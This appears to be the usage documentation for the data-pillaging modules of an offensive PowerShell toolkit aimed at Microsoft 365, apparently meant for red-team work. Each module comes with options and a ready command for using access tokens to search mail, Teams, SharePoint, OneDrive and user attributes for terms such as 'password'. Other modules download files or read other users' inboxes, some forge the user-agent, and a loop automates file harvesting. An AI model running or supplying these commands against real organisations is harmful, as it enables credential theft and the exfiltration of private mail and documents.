Pillage Modules

Pillage

Invoke-SearchMailbox

This module uses the Graph search API to search for specific terms in emails and allows the user to download them including attachments.

--OPTIONS--
Tokens         - Pass the $tokens global variable after authenticating to this parameter
SearchTerm     - The term you want to search for in the mailbox
MessageCount   - The amount of messages returned in the search results (default = 25)
OutFile        - File to output a list of emails to
DetectorName   - Custom label used when exporting results for detector-based workflows
GraphRun       - Internal switch used by Invoke-GraphRunner to suppress interactive output
PageResults    - Enables paging to page through results

Invoke-SearchMailbox -Tokens $tokens -SearchTerm "password" -MessageCount 40

Invoke-SearchSharePointAndOneDrive

This module uses the Graph search API to search for specific terms in all SharePoint and OneDrive drives available to the logged in user. It prompts the user which files they want to download.

--OPTIONS--
Tokens         - Pass the $tokens global variable after authenticating to this parameter
SearchTerm     - The term you want to search for. This accepts KQL queries so you can use terms like "filetype", "content", and more.
ResultCount    - The amount of files returned in the search results (default = 25)
DetectorName   - Custom label used when exporting results for detector-based workflows
OutFile        - File to output a list of hits to
ReportOnly     - Skip the interactive download prompt and only report findings
PageResults    - Using paging it will return all possible results for a search term
GraphRun       - Internal switch used by Invoke-GraphRunner to suppress interactive output
Device         - Forge the user-agent as a specific device type
Browser        - Forge the user-agent as a specific browser type

Invoke-SearchSharePointAndOneDrive -Tokens $tokens -SearchTerm 'password AND filetype:xlsx'

You can use this short script to loop through the default_detectors.json file (Snaffler-like functionality)

$folderName = "SharePointSearch-" + (Get-Date -Format 'yyyyMMddHHmmss')
New-Item -Path $folderName -ItemType Directory | Out-Null
$spout = "$folderName\interesting-files.csv"
$DetectorFile = ".\default_detectors.json"
$detectors = Get-Content $DetectorFile
$detector = $detectors |ConvertFrom-Json
foreach($detect in $detector.Detectors){Invoke-SearchSharePointAndOneDrive  -Tokens $tokens -SearchTerm $detect.SearchQuery -DetectorName $detect.DetectorName -PageResults -ResultCount 500 -ReportOnly -OutFile $spout -GraphRun}

Invoke-DriveFileDownload

This module downloads individual files from SharePoint or OneDrive using the DriveID:ItemID values returned by Invoke-SearchSharePointAndOneDrive.

--OPTIONS--
Tokens         - Pass the $tokens global variable after authenticating to this parameter
DriveItemIDs   - Combined value of the drive ID and item ID separated by a colon
FileName       - The filename you want to save the file as
Device         - Forge the user-agent as a specific device type
Browser        - Forge the user-agent as a specific browser type

Invoke-DriveFileDownload -Tokens $tokens -FileName "Passwords.docx" -DriveItemIDs "b!wDDN4DNGFFufSAEEN8TO3FEfeD9gdE3fm2O_-kGSapywefT_je-ghthhilmtycsZ:01AVEVEP23EJ43DPEVEGEF7IZ6YEFEF222"

Invoke-ImmersiveFileReader

Simple module to read a file with the immersive reader.

--OPTIONS--
Tokens           - Pass the $tokens global variable after authenticating to this parameter
SharePointDomain - The target SharePoint domain. e.g. targetcompany.sharepoint.com
DriveID          - The drive ID
FileID           - The ID of the file to open
Device           - Forge the user-agent as a specific device type
Browser          - Forge the user-agent as a specific browser type

Invoke-ImmersiveFileReader -Tokens $tokens -SharePointDomain targetcompany.sharepoint.com -DriveID <drive ID> -FileID <FileID>

Invoke-SearchTeams

This module uses the Substrate search API to search for specific terms in Teams channels visible to the logged in user.

--OPTIONS--
Tokens         - Pass the $tokens global variable after authenticating to this parameter
SearchTerm     - The term you want to search for in Teams messages
ResultSize     - The amount of messages returned in the search results (default = 50)
DetectorName   - Custom label used when exporting results for detector-based workflows
OutFile        - File to output the results of the search to
GraphRun       - Internal switch used by Invoke-GraphRunner to suppress interactive output

Invoke-SearchTeams -Tokens $tokens -SearchTerm "password" -ResultSize 100

Invoke-SearchUserAttributes

This module will query user attributes from the directory and search through them for a specific term.

--OPTIONS--
Tokens         - Pass the $tokens global variable after authenticating to this parameter
SearchTerm     - The term you want to search across user attributes

Invoke-SearchUserAttributes -Tokens $tokens -SearchTerm "password"

Get-Inbox

This module will pull the latest emails from the inbox of a particular user. NOTE: This is the module you want to use if you are reading mail from a shared mailbox.

--OPTIONS--
Tokens         - Pass the $tokens global variable after authenticating to this parameter
userid         - Email address of the mailbox you want to read
TotalMessages  - Default is 25, Max is 1000
OutFile        - File to output the results to

Get-Inbox -Tokens $tokens -userid deckard@tyrellcorporation.io -TotalMessages 50 -OutFile emails.csv

Get-TeamsChat

This module downloads full Teams chat conversations. It will prompt to either download all conversations for a particular user or if you want to download individual conversations using a chat ID. This modules requires that you have a token scoped to Chat.ReadBasic, Chat.Read, or Chat.ReadWrite.

--OPTIONS--
Tokens         - Pass the $tokens global variable after authenticating to this parameter

Get-TeamsChat -Tokens $tokens